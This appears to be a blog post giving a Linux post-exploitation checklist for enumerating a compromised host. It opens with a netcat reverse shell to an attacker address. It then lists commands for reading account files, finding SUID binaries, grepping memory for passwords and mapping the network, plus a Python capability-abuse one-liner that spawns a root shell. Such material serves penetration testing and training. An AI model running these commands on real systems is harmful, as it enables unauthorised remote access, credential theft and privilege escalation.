If your console is narrow, widen it at the beginning:
stty rows 50 cols 200
Consider to directly spawn another reverse shell:
nc -e /bin/sh $attackerip 4444 &
Basic enumeration about the host
id
groups
cat /etc/passwd
cat /etc/group
cat /etc/hosts
cat /etc/fstab
uname -a // Check for kernel exploits
// ALSO search for kernel exploits with OS name!
// If this doesn't work: cat /proc/version
sudo -l // See blog post about details.
su // same password, if known
cat /etc/fstab && lsblk || mount // if there is something to mount, mount it.
Check chron:
cat /etc/crontab
cd /etc/cron.d...
grep "CRON" /var/log/syslog
Look into the home and some other directories:
cd /home && find ...
cd /root
cd /etc/profile.d
cd /opt
See what’s installed:
ps aux // Note all process which run with root permissions (mysql...)
systemctl // shows all services, active and inactive!
systemctl status // hierarchical view of all active services.
dpkg -i // or other, depending the distro
Browse through the logs
- On old systems: Browse throuh the files:
cd /var/log - Sytems with systemd:
- See all:
journalctl
- See all:
Check for files from interesting users
for user in u1 u2; do find / -user $user 2> /dev/null | grep -v \/proc; find / -group $user 2> /dev/null | grep -v \/proc; done
If there is only the current user, use this:
find / -user $user 2> /dev/null | grep -v \/proc; find / -group $user 2> /dev/null | grep -v \/proc;
More things to do:
- Search for SSH key files
- Investigate user cron files (See here for a list of all possible cron files.)
- Investigate web server configuration files
- Investigate email directories.
- Search for SUID and SGUID files. Note that the minus sign means mask mode.
find / -perm -2000 -o -perm -4000 -print 2>/dev/null - Search for world write readable files:
find . -perm -o+r - Search for directories you can write into:
find / -writable -type d 2>/dev/null - Search for files within a time window:
find / -newermt 2020-01-02 ! -newermt 2020-02-01 2> /dev/null - Scan the memory for passwords
strings /dev/mem -n10 | grep -i PASS
Network enumeration
Show network configuration
ifconfig
ip a
ss -natup
netstat -tulpen
List open ports. Note them in your list and enumerate them (maybe via forwarding).
netstat -natup // If you can, use sudo to see all binaries. netstat -ano
Have a look into the packet filter, e.g.
cat /etc/iptables/rules.v4
List active neighbour systems
ip neigh arp -en
Various more unprobably things to try
Check unusual capabilities (See the Linux security fundamentals post, if found something; For example, if an interpreter like Python should have cap_setuid+ep set, then it can change its uid although in a user process. (In this case: python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'))
getcap // try this first. If the binary is not on the system, the following command returns always null :) Sometimes it is in /usr/sbin/getcap
getcap -r / 2>/dev/null
Try to see if AppArmor is installed:
aa-status
More things:
debsums | grep -v O
tmux ls
screen -list
Leave a Reply
You must be logged in to post a comment.